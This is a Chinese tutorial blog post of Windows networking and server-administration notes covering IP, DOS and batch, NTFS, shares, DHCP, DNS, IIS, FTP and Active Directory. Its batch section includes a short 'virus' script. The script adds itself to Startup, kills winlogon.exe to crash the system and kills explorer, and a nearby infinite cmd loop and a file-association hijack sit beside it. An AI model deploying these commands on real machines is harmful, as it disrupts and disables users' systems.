首页 > 技术文章 > 网络通信原理-局域网、DOS、用户与组、远程、NTFS、文件共享、DHCP、DNS、WEB、FTP、域、PKI、扫描与爆破

zrh918 2021-07-22 14:22 原文

目录

一、局域网

二、ip地址等相关概念

2.1、IP地址

2.2、子网掩码

2.3、IP地址详解

2.4、网关

2.5、DNS

三、进制转换

四、基础DOS命令

五、批处理

六、用户与组管理

6.1、用户管理

6.2、组管理

七、远程管理

7.1、图形化远程管理

7.2、windows命令远程管理

7.3、查看本地上所有开放的端口

八、NTFS

8.1、NTFS权限解析

8.2、文件系统概述

8.3、NTFS特点

8.4、修改NTFS权限

九、文件共享服务(CIFS)

9.1、创建共享

9.2、访问共享

9.3、隐藏共享

9.4、访问隐藏共享的方法

9.5、net share、netstat命令

9.6、屏蔽系统隐藏共享

十、DHCP部署与安全

10.1、DHCP作用

10.2、DHCP相关概念

10.3、DHCP优点

10.4、DHCP原理

10.5、DHCP续约

10.6、部署DHCP服务器

10.7、地址保留

10.8、选项优先级

10.9、DHCP备份

10.10、DHCP 攻击与防御

十一、DNS部署与安全

11.1、DNS

11.2、域名组成

11.3、监听端口

11.4、DNS解析种类

11.5、DNS软件安装

11.6、DNS服务器搭建

11.7、桥接上网部署

11.8、清除DNS服务器缓存

11.9、反向解析

11.10、辅助DNS服务器

11.11、转发器/根

11.12、别名(cname)

11.13、DNS请求顺序

11.14、记录类型

11.15、DNS服务器分类

十二、WEB服务器

12.1、Web服务器基本概述

12.2、部署web服务器

12.3、练习测试

12.4、网站类型

12.5、发布动态网站

十三、FTP服务器

13.1、FTP服务器基本概述

13.2、配置FTP服务器

13.3、FTP工作模式

十四、域(Domain)

14.1、内网环境

14.2、域的组成

14.3、域的部署

14.4、活动目录

14.5、部署安装活动目录

14.6、PC加入域

14.7、创建域账户

14.8、常见的小问题

14.9、OU:组织单位

14.10、组策略:Group Policy = GPO

14.11、添加其他策略

14.12、综合小实验

十五、渗透测试简单流程

15.1、渗透简单流程

15.2、手工测试端口号开放

15.3、渗透测试实验

15.3.1、scanport扫描445端口

15.3.2、进行暴力破解:NTscan

15.3.3、漏洞利用之IPC$

15.3.4、制作木马

15.3.5、植入木马(留后门)

15.3.6、设置计划任务自动执行木马

15.3.7、等待肉鸡上线

十六、PKI

16.1、PKI概述

16.2、信息安全三要素

16.3、哪些IT领域用到PKI

16.4、公钥加密技术

16.5、证书

16.6、实验名称:部署HTTPS服务器/部署SSL服务器

十七、扫描与爆破

17.1、主机探测与端口扫描

17.2、Nmap-扫描器之王

17.3、Hydra九头蛇

17.4、本地破解Getpass

------------------------------------------------------------------------------

一、局域网

局域网:一般称为内网

单局域网构成:交换机,网线,pc

交换机:用来组建内网的局域网的设备,并不能让局域网上网,路由器只能实现连接内网和外网。

二、ip地址等相关概念

2.1、IP地址

32位二进制

********.********.********.********

为了方便变为10进制: *.*.*.* (*的范围 0-255)

2.2、子网掩码

局域网通信规则:在同一个局域网中,所有IP必须在同一个网段才可以互相通信

IP构成:网络位 +主机位(网络位相同的IP地址,为同一个网段)

子网掩码:用来确定IP地址的网络位

子网掩码如何确定网络位: 与255对应的数字为网络位,与0对应的数字为主机位

子网掩码的个数

255.0.0.0

255.255.0.0

255.255.255.0

备注:子网掩码正确格式为连续的1和连续的零组成,两者不能穿插

如果0和1穿插的话,就会报错:

253.0=11111101.00000000

2.3、IP地址详解

ISO定义五大类:(是以IP地址的第一位进行区分的)

A类:1-126 默认子网掩码:255.0.0.0

B类:128-191 默认子网掩码:255.255.0.0

C类:192-223 默认子网掩码:255.255.255.0

D类:224-239 组播地址

E类:240-254 科研使用

注:目前我们只能使用A、B、C类 子网掩码可以修改

每个网段的地址分三类:

1、主机位全为0 是该网段的名称

2、主机位为255 是该网段的广播地址

3、中间的可用地址

比如:

此地址的网段名称为192.168.0.0

此地址的广播地址为192.168.255.255

127.0.0.1 回环地址(跟自己通信)

2.4、网关

网关:一个网络的出口,Gateway=GW,一般网关在路由器上

路由器:可以连接外网的设备

#pc向外发包的心理活动

1、首先判断目标IP与自己是否在 同一个网段

2、如在同一个网段,则直接发出去,不找网关

3、如不在同一个网段,则发包给网关

2.5、DNS

互联网的一项服务,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。

ping 目标IP地址              #测试网络连通性,有去有回即为可以成功通路

ping -t 目标IP地址           #一直ping

ping -n 数字 目标ip地址      #修改ping包的数量(默认4)

ping -l 数字 目标ip地址      #修改ping 包的大小

手工解析域名

nslookup www.baidu.com

如何查看ip

ipconfig           #查看ip基本信息
ipconfig /all      #查看ip所有信息

客户机用域名访问网站的心理活动:

先看缓存、缓存没有看本地hosts文件、再没有才会问DNS服务器。

三、进制转换

四、基础DOS命令

#1、命令: color fe
帮助:color ?
作用:改变背景及字体颜色

#2、命令: cls
作用:清屏

#3、命令:dir
作用:浏览当前文件夹的内容(带<dir>标识的为文件夹,否则为文件)
其他用法︰
dir 指定路径
dir d:\
dir d:\pic
dir /a    浏览所有内容,包括隐藏内容
dir *.* /b > case.txt #将文件夹下所有的文件名字保存到case.txt(在目标文件夹的路径中打开cmd )/b表示只显示文件名

#4、命令∶盘符
作用:切换分区,如: c:、d:、e:

#5、命令: cd..
作用:退出一级目录

#6、命令:cd文件夹名
作用:进入文件夹

#7、Tab键
作用:补全路径功能
#8、命令: cd \ 作用:直接退到根目录 #9、命令 :md 文件夹〔文件夹1、文件夹2....] 作用:创建文件夹 #10、命令:rd 文件夹 [文件夹1、文件夹2...] 作用:删除空文件夹 命令:rd 文件夹 /s /q 作用:无提示删除非空文件夹 #11、路径 相对路径∶针对当前路径有效,如: ..\456 绝对路径:从根开始写路径,如: \123\345 #12、创建文件方法: echo 字符串 >>[路径1]文件名.扩展名 echo后如果不加">"">>"就表示在屏幕输出内容。 注释:>>和>都可以将命令的输出内容输入到某文件中,若文件不存在,则同时创建该文件 >>为追加 >为覆盖 案例∶修改hosts文件 echo 1.1.1.1 www.baidu.com >>c:\windows\system32\drivers\etc\hosts #13、 清空磁盘 rd . /s/q #14、浏览文件 type 文件名.扩展名 显示 type 文件名.扩展名 |more 分页显示 例如:dir c:\windows |more #15、创建文件 1)echo 2) copy con 文件名.扩展名 开始编写内容 ctrl+z 回车结束编写 #16、删除文件 del *.txt 删除所有txt结尾的文件 del *.* 删除文件 del *.* /s/q 无提示删除 #17、文件夹属性操作 attrib +h 文件名 隐藏文件夹 attrib -h 文件名 取消隐藏文件夹 attrib +h +s +a 文件名 将文件夹隐藏设为系统文件 dir /a 显示当前磁盘所有包括系统文件 #18、快速生成一个空文件(有大小) fsutil file createnew c:\system.ini 数字 在c盘创建文件指定文件大小(这里数字的单位是Byte) #19、修改关联 assoc .txt=exefile 修改打开txt文件的程序 使其无法打开 assoc .txt=txtfile 恢复 #20、shutdown shutdown -s -t 100 定时关机 shutdown -s -f -t 100 定时强制关机 shutdown -r -t 定时重启 shutdown -a 取消一切定时 shutdown -l 注销,同logoff命令相同 shutdown -s -f -t 100 -c "显示信息" #20、重命名、移动、复制、获取文件名 ren 旧名 新名 重命名 move 原地址 新地址 移动 copy 原地址 目的地址 复制粘贴

五、批处理

方法:创建一个记事本文件,然后将其扩展改为.bat

批处理作用:自上而下成批处理每一条DOS命令,直到执行到最后一条,不管每条命令成功与否都会执行下一条命令。

#批处理语法
1、@echo off #关闭回显
2、title HK-9527v1.0 #设置程序名
3、pause #暂停屏幕
4、echo. #空一行
5、start #命令后可跟网页、某路径下的程序,如果什么都不填,那就是默认打开cmd
6、%*% #取变量*的值
7、Userprofile #是一个变量,存储的是登录用户的家目录
8、路径中有特殊符号的时候要加双引号
9、>nul 2>nul #清除一条命令执行后的系统反馈,如果有错误也不显示
10、set /p u=(字符串) #获取输入的字符,将其赋值给变量u
11、:3 #表示"3"区块
12、goto 区块名 #程序跳该区块
13、if "%num%"=="1" 命令1 #如果条件成立,执行命令1;条件不成立,跳过命令1,向下走
14、%0 #循环
start cmd
%0
这样就会无限打开cmd窗口
#几种特殊的cmd语句
ntsd -c q -pn winlogon.exe #蓝屏操作,强制指定杀死登录窗口程序(只针对2003)
taskkill /im explorer.exe /f #任务进程杀死命令,杀死命为explorer的进程,/f表强制
start C:\windows\explorer.exe #开启桌面进程
copy **.bat "%userprofile%\Start Menu\Programs\Startup" #将某个bat程序拷贝到启动项里(win10)

 案例:设计一个好的小工具

@echo off
color 0a
title HK-9527工具箱
:mean
cls
echo==============HK-9527工具箱==============
echo.
echo              1、定时关机
echo              2、取消自动关机
echo              3、打开网页
echo              4、隐藏桌面
echo              5、显示桌面
echo              6、退出
echo.
echo=========================================
set /p a=请输入功能对应的序号
if "%a%"=="1" goto 1
if "%a%"=="2" goto 2
if "%a%"=="3" goto 3
if "%a%"=="4" goto 4
if "%a%"=="5" goto 5
if "%a%"=="6" goto 6
echo 输入错误请重新输入功能编号!
pause
goto mean
:1
set /p time=请输入定时:
shutdown -s -f -t %time%
goto mean
:2
shutdown -a
goto mean
:3
set /p url=请输入网址:
start %url%
goto mean
:4
taskkill /im explorer.exe /f >nul 2>nul
echo 桌面已被隐藏
pause
goto mean
:5
start C:\windows\explorer.exe 
echo 桌面已开启
pause
goto mean
:6
exit

案例:设计病毒文件

copy 病毒.bat %userprofile%/启动文件路径
ntsd -c q -pn winlogon.exe
taskkill /im explorer.exe /f

六、用户与组管理

windows服务器系统:win2000 win2003 win2008 win2012

linux服务器系统:Redhat Centos

6.1、用户管理

每个用户有自己的唯一的SID(安全标识符)

用户SID:S-1-5-21-426206823-2579496042-14852678-500

系统SID:S-1-5-21-426206823-2579496042-14852678(电脑标识)

windows 系统管理员administrator的UID是 500,普通用户是1000 开始的

linux 系统管理员root 的UID是 0,普通用户是1000开始

账号密码存储的位置 : C:\windows\system32\config\SAM(暴力破解,撞库)

windows系统上,默认密码最长有效期42天(尤其是服务器系统)

#查看用户的SID
cmd---whoami /user

(1)内置账户

给人使用的:

administrator 管理员账号

guest 来宾账户

普通用户没有关机权限(因为服务器轻易不关机),来宾账户一注销,配置文件就被删除了

计算机服务组件:

system 系统账户,权限至高无上

local services 本地服务账户 普通权限

network services 网络服务账户 普通权限

(2)配置文件

每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生,路径是∶

win7/win2008在  C:\用户\

xp/win2003在  C:\Documents and Settings\

(3)账户dos命令

1.net user                   #查看账户列表
2.net user 账户名 字符串       #修改密码
3.net user 账户名             #查看账户信息
4.net user 账户名 密码 /add    #新建账户
5.net user 账户名 /del        #删除账户
6.net user 账户名 /active:yes/no    #激活或禁用账户

6.2、组管理

组的作用:简化权限赋予,N多人在一个组有相同的权限。

赋权限方式:

①用户 - 组-赋权限

②用户 - 赋权限

内置组(系统自带组)内置组的权限已经被系统赋予

administrators      #管理员组
guests              #来宾组
users               #普通用户组
Network Configuration Operators           #网络配置组
print               #打印机组
Remote Desktop      #远程桌面组

组DOS命令

1.net localgroup     #列出组列表
2.net localgroup 组名    #查看组成员
3.net localgroup 组名 /add     #创建组
4.net localgroup 组名 用户名 /add   #添加组成员
5.net localgroup 组名 用户名 /del   #删除组成员
6.net localgroup 组名 /del       #删除组

把某个成员从users组中拉到administrators组中称为提权,把某个成员从administrators组中拉到users组中称为降权。

七、远程管理

7.1、图形化远程管理

将XP与Win2003搭载到一台交换机上

给XP、Win2003配置同一网段的ip地址

在Win2003上打开远程连接

在Win2003创建用户,并为用户添加远程连接组权限

在Xp上输入mstsc进行连接

过程:

#服务器上创建远程连接账户
net user test test /add
net localgroup "Remote Desktop Users" test /add
net localgroup "Remote Desktop Users"

7.2、windows命令远程管理

在以上的基础上加上以下操作

在服务器中开启telent服务

将远程连接账户添加进telent组

net user test test /add
net localgroup TelnetClients test /add
net localgroup TelnetClients

之后在Xp上进行命令行连接

注意:win10客户机进行命令连接的时候必须开启telnet客户端

控制面板--程序--启用或关闭windows功能---勾选Telne客户端

telnet 10.1.1.2
输入账号密码
跳转到的cmd窗口就是已经连接上的服务器的窗口

7.3、查看本地上所有开放的端口

netstat -an

八、NTFS

8.1、NTFS权限解析

(1)通过设置NTFS,实现不同用户访问对象(文件,文件夹)的不同权限

(2)分配了正确访问权限后,用户才能访问不同的权限

(3)设置权限防止资源被篡改、删除

8.2、文件系统概述

文件系统即在外部存储设备上组织文件的方式

如果一个分区不建立文件系统,就无法存储文件,我们所说的格式化,就是制作文件系统

常见的文件系统

FAT      windows

NTFS     windows(最新的文件系统类型)

EXT      linux常见

**.txt指向某一个簇,我们再去调取簇里面的内容才能完成对文件的操作,一个簇里面只能存放一个文件,所以会造成浪费。

如果硬盘存放的是小而琐碎的文件,那么分配簇越小越好,指针读取的次数增多,速度变慢。

如果硬盘存放的是大而单一的文件,那么分配簇越大越好,指针读取的次数减少,速度变快。

8.3、NTFS特点

1、提高磁盘读写性能

2、可靠性

加密文件系统

访问控制列表(设置权限)ACL

3、磁盘利用率

压缩

磁盘配额(给不同的用户可以使用的磁盘额度)

4、支持单个文件大于4个G

8.4、修改NTFS权限

8.4.1、取消继承

作用:取消后,可以任意修改权限列表

方法:文件右键属性 - 安全 - 高级

8.4.2、文件及文件夹权限

8.4.3、权限累加

当用户同时属于多个组,权限是可以累加的。

这里要注意创建新用户时,新用户默认是被添加到Users组的

8.4.4、拒绝最大

当用户权限累加时,遇到拒绝权限,拒绝最大

8.4.5、取得所有权

8.4.6、强制继承

作用 :对下强制继承父子关系

8.4.7、文件复制剪切对权限的影响

同分区移动(剪切,不是复制)文件,文件的权限不会被目标文件的权限覆盖,其余的操作都会被目标文件的权限覆盖。

其余的操作,比如跨分区复制、移动文件,同分区复制文件。

九、文件共享服务(CIFS)

cifs -微软开发-对内偏多(公司员工之间)

ftp -全球通用-对外偏多(公司客户之间)

9.1、创建共享

方法:文件夹右键属性--共享--开启共享--设置共享名--设置共享权限

(1)在本地登录时,只受NTFS权限的影响

(2)在远程登录时,将受共享及NTFS权限的共同影响,且取交集

(3)所以建议设置共享权限为everyone完全控制,然后具体的权限在NTFS中设置即可

注意:test1在homework文件夹里有写入权限,当写入文件的名字与homework文件夹中文件的名字冲突时,是写入不成功的,除非与之冲突的文件也是自己刚刚上传的。

9.2、访问共享

在开始运行或我的电脑地址栏中,输入UNC地址(\\+ip):

①文件共享服务器IP

②文件共享服务器IP\共享名

注意是共享名,不是文件名

注意:Win10系统需要开启WindowsSMB功能

9.3、隐藏共享

在分享时将分享名后输入$符号

这样其他用户访问时此文件夹将自动被隐藏

9.4、访问隐藏共享的方法

若要查看隐藏分享文件夹,可以手动地址栏后输入隐藏文件夹名

手动地址栏后输入隐藏文件夹名之后:

9.5、net share、netstat命令

1、net share             #列出共享列表
2、net share 共享名 /del  #删除文件的共享功能,并不会删除原文件
3、net share case$=C:\   #创建共享名为case$,共享资源为C:\的命令
4、netstat -an           #查看本地网络连接状态和已开启的端口服务

9.6、屏蔽系统隐藏共享

9.6.1、修改注册表

(1)注册表

注册表相当于一个城市中公安系统的户籍科,户籍科寻访的都是每个公民的详细信息,那么注册表中存放的都是注册信息、软件信息等。

重装系统之后因为删除了注册表,所以装在其他盘里的软件都变成了黑户,所以多少在使用的过程中会出现问题。

打开注册表编辑器 :打开运行 、regedit

(2)定位共享注册表位置

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters

右键新建REG_DWORD类型的 AutoShareServer 键,值为0

这样就可以屏蔽系统自动产生的隐藏共享

9.6.2、关闭445服务

可以通过关闭445端口来达到关闭 IPC$,可以屏蔽病毒传入(如:勒索病毒等)

方法一:打开services.msc ,并停止及禁用server服务

方法二:禁止被访问445,配置 高级安全防火墙 - 入站规则(win7、win2008及以上系统)

备注:一个服务对应一个端口

3389   # 远程桌面

23  # telnet

445  # 共享服务

十、DHCP部署与安全

10.1DHCP作用(Dynamic Host Configuration Protocol)

DHCP(动态主机配置协议)是一个局域网的网络协议,指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码

10.2DHCP相关概念

地址池/作用域:(IP,子网掩码,网关,DNS,租期),DHCP 协议端口是 UDP 67,68

10.3DHCP优点

减少工作量,避免IP冲突,提高地址利用率。

10.4DHCP原理

称为DHCP租约过程,分为4个步骤:

①客户机发送DHCP Discovery 广播包

客户机广播请求IP地址(包含客户机的MAC地址)

②服务器响应DHCP Offer广播包

服务器响应提供的IP地址(但无子网掩码、网关等参数)

③客户机发送DHCP Request广播包

客户机选择IP(也可认为确认使用哪个IP)

④服务器发送DHCP ACK 广播包

服务器确定了租约,并提供网卡详细参数IP、掩码,网关、DNS、租期等

ACK (Acknowledge character)即是确认字符

10.5、DHCP续约

Dhcp每次的租期时间是由我们搭建服务器的时候设置的,具体的时间视情况而定。

例如KFC等商家,越短越好,如果设置为1年的租期,那么即使用此ip的人离开了,那个ip也不能用,必须等到租约到期时才能收回ip地址。

50%过后,客户机会再次发送DHCP Request包,进行续约,如果服务器无响应,则继续使用并在87.5%时,再次发送DCHP Request包,进行续约,如服务器任然无响应,就释放IP地址,并重新发送DHCP Discovery 广播包来获取IP地址,当无任何服务器响应时,自动给自己分配一个169.254.X.X/16(255,255,0,0),全球统一无效地址,用于临时局域网的内网通信!

10.6、部署DHCP服务器

Windows、Linux、三层交换机、路由器都可以做DHCP服务器。

第一步:交换机配好、ip配好(客户机自动获取ip,服务器手动输入ip)

第二步:软件装好

第三步:创建地址池、作用域

备注:

网关和DNS为此作用域的选项

虚拟机这个软件在第一天装好之后,他在虚拟的v1、v8交换机上都偷偷的藏了一台虚拟的DHCP服务器,所以如果选择了V1、V8交换机就需要把虚拟机自身的DCHP关掉

在安装软件的时候需要将服务器的ip地址进行手动写入,不然就会出现以下错误:

等待安装完成后打开DHCP界面:开始---管理工具---DHCP

服务器验证:

DCHP服务器对应的端口号为UDP 67,68

DHCP服务器搭建完成后,就可以给客户机进行沟通了,我们在客户机上输入ipconfig /all:

客户机验证:

客户机即使关机了,只要租约期限没有到期,那么这个ip就不会被收回,只有到租约期限结束时,才会收回,但是如果客户机主动释放ip,那么此ip就会立即被收回到作用域中。

ipconfig /release  #释放IP(取消租约,或者改为手动配置IP,也可以释放租约)
ipconfig /renew    #重新获取IP(有IP时,发送Request续约,无IP时,发送Discovery重新获取)

10.7、地址保留

对指定的MAC地址,把动态分配的IP地址固定

比如:在公司里,老板获取的ip是固定值,回到家之后电脑自动获取ip

那么老板那边的ipconfig /all 就是我们刚刚设置的:

10.8、选项优先级

作用域选项是用来添加DNS、网关等信息

如果创建多个作用域时,暂时不填写DNS信息,等作用域创建完成后,在服务器选项中进行创建DNS信息,这样在服务器选项中创建的信息就会应用到每个作用域中

但是 作用域选项的优先级 > 服务器选项的优先级,在服务器选项设置了DNS、作用域也设置了DNS,那么优先使用作用于设置的。

服务器选项设置:

设置之后作用域的DNS都变成了 114.114.114.114

再进行作用域选项设置:

可以看到设置后的DNS为8.8.8.8,所以作用域选项的优先级 > 服务器选项的优先级

备注:

服务器的地址必须和提供的地址在同一网段。

每个作用域的网关必须对应作用域的网段,所以不可以在服务器设置中设置网关。

10.9DHCP备份

10.10、DHCP 攻击与防御

①攻击DHCP服务器:频繁的发送伪装DHCP请求,直到将DHCP地址池资源耗尽

防御:在管理型交换机端口上做动态MAC地址绑定

②伪装DHCP 服务器攻击:hack通过将自己部署的DHCP服务器,为客户及提供非法IP

防御:在交换机上(管理型),除合法的DHCP服务器所在的接口外,全部设置为禁止发送DHCP Offer包

十一、DNS部署与安全

11.1DNS

Domain Name Service

域名服务

作用:为客户机提供域名解析服务

11.2、域名组成

如“www.sina.com.cn”是一个域名,从严格意义上来说“sina.com.cn”才被称为域名(全球唯一),而“www”是主机名

“主机名.域名”称为完全限定域名(FQDN),一个域名下可以有多个主机,域名全球唯一,那么“主机名 .域名”肯定也全球唯一。  

 以"sina.com.cn"域名为例,一般管理员在命名其主机的时候会根据其主机的功能而命名。

比如网站的是www,博客的是blog,论坛的是bbs,那么对应的FQDN为www.sina.com.cn , blog.sina.com.cn , bbs.sina.com.cn。

这么多个FQDN,然而我们只需要申请一个域名即"sina.com.cn"即可,FQDN=主机名.DNS后缀(完整合格的域名).

www.baidu.com.
". " 为根域
".com" 为顶级域
"baidu" 为一级域名
"www" 为主机名

11.3、监听端口

TCP53

UDP53

11.4DNS解析种类

11.4.1、按照查询方式分类

(1)递归查询:客户机与本地DNS服务器之间

(2)迭代查询:本地DNS服务器与根等其他DNS服务器的解析过程

下图中的本地DNS服务器为直接提供服务解析的服务器,不是在公司内部的DNS服务器。

11.4.2、按照查询内容分类

(1)正向解析:已知域名,解析IP地址

(2)反向解析:已知IP地址,解析域名

11.5、DNS软件安装

11.6、DNS服务器搭建

然后我们对客户机进行DNS配置,并对www.baidu.com的域名进行解析,结果就是我们刚才设置的1.1.1.1

ipconfig /flushdns     #清空本地DNS缓存
ipcpnfig /displaydns   #查看本地DNS缓存

11.7、桥接上网部署

将xp与2003桥接上网,部署2003为DNS服务器,xp指向2003,并能实现xp正常上网

wmware中的vmnet0代表的是真实的交换机,开启之后的原理图如下:

开启之后,我们的虚拟机xp和虚拟机2003都会直接连接到我们真实生活中的交换机上,那么我们就可以将2003作为DNS服务器,虚拟机xp作为客户机实现现实生活中的场景。

开启vmnet0的配置:

将客户机XP的DNS配置为2003的ip地址,然后在xp上进行ping操作,发现可以成功,原理为迭代查询:

 在2003服务器上修改www.baidu.com的ip地址,结果如下:

虚拟机Vmnet口解释:

11.8、清除DNS服务器缓存

11.9、反向解析

是指在大部分的 DNS 搜索中,客户机一般执行正向搜索。

DNS 同时提供反向搜索,允许客户机根据一台计算机的IP 地址搜索它的DNS名称。

如下图,在没有设置反向解析的时候,server为unknow

下面开始设置反向解析:

我们将服务器名设置为hk.server,下面在进行解析就不是unknow了,就是我们设置的hk.server 

11.10、辅助DNS服务器

成功备份区域解析记录

如下图,用户使用188.188.188.1解析www.hk9527.com可以成功,配置辅助DNS服务器之后,用户使用188.188.188.2解析www.hk9527.com也可以成功。

11.11、转发器/根

然后我们在188.188.188.2的服务器上搭建www.jd.com的DNS,解析到7.7.7.7

再次在客户机上进行解析就可以得出7.7.7.7的结果。

11.12、别名(cname)

例如zoom.hk9527.com的别名为z.hk9527.com,那么访问z.hk9527.com也可以转到zoom.hk9527.com

同理,www.hk9527.com也可以起别名为w.hk9527.com

最后一行的Aliases就表示别名的意思。

11.13、DNS请求顺序

客户机处理DNS请求顺序:DNS缓存 --> 本地hosts文件 --> 找本地DNS服务器

服务器处理DNS请求顺序:DNS高速缓存 --> 本地区域解析文件 --> 转发器 --> 根

11.14、记录类型

A记录:正向解析记录

PTR记录:反向解析记录

CNAME:别名

MX:邮件交换记录

NS:域名服务器解析

11.15、DNS服务器分类

主要名称服务器、辅助名称服务器、根名称服务器(13个根)、高速缓存名称服务器

十二、WEB服务器

12.1、Web服务器基本概述

(1)WEB服务器也称网页服务器或HTTP服务器

(2)web服务器使用的协议是HTTP或HTTPS

(3)HTTP协议端口号:TCP 80、HTTPS协议端口号:443

(4)WEB服务器默认站点路径:C:\Inetpub\wwwroot

(5)WEB服务器发布软件:

微软:IIS(可发布web网站和FTP站点)

Linux:Apache/LAMP/Tomcat/Nginx.etc

第三方:phpstudy、XAMPP

12.2、部署web服务器

(1)配置静态IP地址

(2)安装IIS-WEB插件

(3)停用默认站点

(4)新建网站--地址端口绑定--指定站点路径--设置权限

(5)设置默认文档(设置首页)

(6)客户机测试访问

12.3、练习测试

(1)不同IP,相同端口

本地连接--属性---Internet协议---高级,将第二个网站指向的ip地址添加进去。

创建第二个网站,将网页文件改为第一位:

这样既可以成功访问,达到不同ip、相同端口的效果

(2)相同IP,不同端口(测试)

创建网站时,将端口号改为8080,这里端口号可以随便填,但是尽量不要填1000以下的。

创建完后将文档顺序调整一下

这样就可以达到同ip不同端口访问,这里要注意访问页面的时候需要加上端口号

(3)相同IP,相同端口,不同域名(DNS主机头)

首先,先要在DNS服务器上创建两个域名,这两个域名指向同一个ip

然后,在IIS管理器上将这两个域名分别分配给两个网站。

这样可以达到相同IP,相同端口,不同域名访问

备注:

如果绑定域名了,那么再利用ip进行访问就不可行了,即使停掉其中一个网站用ip也访问不了,此时只能再进行添加一个没有主机头部的标识

但是这种方法只能用于一个站点,因为有多个站点就会重复了。

12.4、网站类型

(1)静态网站:一般扩展名为.html或.htm

无法与后台数据库进行互动

(2)动态网页:一般扩展名为.asp或.php

有后台数据库,asp或php可以连接前台页面与后台数据库

Asp一般在微软平台可以运行,Linux里没有这个语言,Linux一般用php

12.5、发布动态网站

 (1)开启web服务拓展

(2)新建DNS区域

(3)新建网站

 (4)启用父路径

启用父路径之后,此站点下的子文件夹也可以访问

(5)调整显示文档顺序

访问结果:

十三、FTP服务器

13.1、FTP服务器基本概述

File Transfor Protocol 文件传输协议

端口号:TCP 20/21

13.2、配置FTP服务器

(1)配置静态IP

(2)安装IIS-ftp软件(上文安装web插件时已经安装过了,这里不再演示)

(3)使用默认站点或创建新的站点

注意:用户最终权限为FTP权限与NTFS权限取交集,建议FTP权限全部勾选,然后具体在NTFS里做!

(4)去掉匿名登录

(5)为ftp创建用户,并设置文件夹的NTFS权限

Win10设置FTP需要先进行几步设置

在客户机连接FTP的时候是在文件夹中输入FTP:\\ IP地址,然后按回车。

13.3、FTP工作模式

(1)主动模式

21端口:控制端口、20端口:数据端口

(2)被动模式

21端口:控制端口、随机端口:数据端口

主动与被动阐述的是数据传输过程,都是对于服务器而言的

主动模式中是20端口主动连接1024端口,被动模式中是4088端口被2048端口连接

选择主动模式还是被动模式的选择权在客户机手里

不管是客户机还是服务器只要开了防火墙,防火墙都会自动关闭一些端口号,这样别人就访问不了了,但是防火墙不会拦截主机端口主动连接的请求,对方回包也不会被拦截,相当于建立了传输通道。

如果服务器开了防火墙,那就必须使用主动模式,且必须让服务器的防火墙开放21、20端口

如果客户机开了防火墙,服务器没开,则使用被动模式

万能法则:客户机是我们可以操控的,关掉客户机防火墙,选择主动模式。

十四、域(Domain)

14.1、内网环境

(1)工作组:默认模式,人人平等,不方便管理

(2)域:人人不平等,集中管理,统一管理

14.2、域的组成

① 域控制器:DC(Domain Controller),简称"域控”,是这个域的老大

② 成员机(成员及之间还是平等的)

14.3、域的部署

(1)安装域控制器就生成了域环境

(2)安装了活动目录就生成了域控制器

(3)活动目录:Active Directory = AD

装DC的时候必须将DNS也同时部署

在新用户加入域环境的时候DNS会自动创建一个A记录

有域的情况下,公司员工必须指向公司自己的DNS服务器,也就是DC服务器

14.4、活动目录

(1)活动目录简称AD,存储公司的总资源,是域里面的核心,所以域也叫AD域

(2)特点:域之所以可以实现集中管理/统一管理,都是因为AD的作用

14.5、部署安装活动目录

安装windows其他组件的时候win2008不需要插光盘,系统已经将所有的安装包存储到电脑里了

两种办法:

(1)我的电脑---管理---属性---角色---添加角色

(2)开始--运行--输入dcpromo,安装活动目录

①开启2008虚拟机,并桥接到某个特定的网卡

②配置静态IP地址188.188.188.1/24

③开始--运行--输入dcpromo,安装活动目录

弹出向导---勾选DNS---新林中新建域---功能级别都设置为win2008域的FQDN---设置目录服务还原密码

④在DC登录域HK9527 \ Administrator,DC的本地管理员升级为域管理员

⑤验证AD是否安装成功

1-计算机右键属性--所属域

2-DNS服务器中是否自动创建HK9527.com区域文件

3-自动注册DC的域名解析记录

4-开始--管理工具--AD 用户和计算机

Computer:普通域成员机列表

Domain Controllers:DC列表

Users:域帐号

(卸载域:先将成员及全部剔除域,再将活动目录卸载,命令也是dcpromo)

14.6、PC加入域

(1)配置IP,并指DNS

(2)计算机右键属性--更改--加入HK9527.COM域

(3)重启加入域后,成功使用用户登录成员机

14.7、创建域账户

14.8、常见的小问题

(1)加入域不成功

网络是不是不通

解析是否成功解析

是否为DNS缓存问题

(2)登入域不成功

XP,如果已勾选登录域HK9527,就不用再写hk9527.com\xiaoke.zhao

(3)域用户的权限

普通域账号登录别的客户机虽然可以登录,但是没有完全控制权限。

如果想让普通域账号在别的客户机上拥有完全控制权限,但是又不想将这个普通域账号提升为域管理员,这个时候可以将这个普通域账号添加到本地管理员组,也就是Administrators

本地管理员组:Administrators、域管理员组:Domain Admins

14.9、OU:组织单位

作用:用来归类域资源(域用户、与计算机、域组)

组和OU的作用都是用来分类的,都可以理解为容器,但是组的目的是赋权限,OU的目的是下发组策略

新建OU:

开始---管理工具---Active Directory 用户和计算机

将用户加入到OU里:

在加入OU里的时候注意,可以将此账户所在的计算机也加入到OU里

用户和计算机一个是限制用户,一个是限制计算机

例如在组策略里将赵小可V这个用户的桌面改为特定图片,那么赵小可v去哪个计算机上都会是特定的计算机

如果将此计算机的桌面设定为特定桌面,那么只要是在这个计算机上登陆的用户都会是这个桌面

如果域组策略和本地组策略冲突时,本地组策略的权限最低

14.10、组策略:Group Policy = GPO

作用:通过组策略可以修改计算机的各种属性,如开始菜单、桌面背景、网络参数等。

重点:组策略在域中,是基于OU来下发的!

比如想要限制“财务部”的桌面,那么就需要在财务部的OU里写一个组策略

开始---管理工具---组策略管理

①表示为整个域的组策略,也就是说如果想对域里面所有的电脑进行操作,就需要在这个组策略里修改

②表示为整个DC的组策略,也就是说如果想对域里面所有的DC进行操作,就需要在这个组策略里修改

新建组策略

 

LSDOU(策略优先级)

L=本地组策略

S=站点(林)

D=域的总组策略

OU=一系列OU的组策略(HK9527集团组策略---市场部组策略---北方市场部组策略,都会读取)

在应用过程中,如果出现冲突,后应用的生效

编辑组策略:将北方市场部的桌面改为特定桌面(注意客户机需要成功加入域、域账号加入到了北方市场部里)

注意:下图中的墙纸地址应该创建一个共享文件,注意共享文件的权限与NTFS权限相交问题

结果:使用加入北方市场部的域账号进行登录,发现桌面已成功设置

组策略的阻止继承及强制

强制:在应用顺序(LSDOU)中应用到此策略为止,后面的策略就不用看了

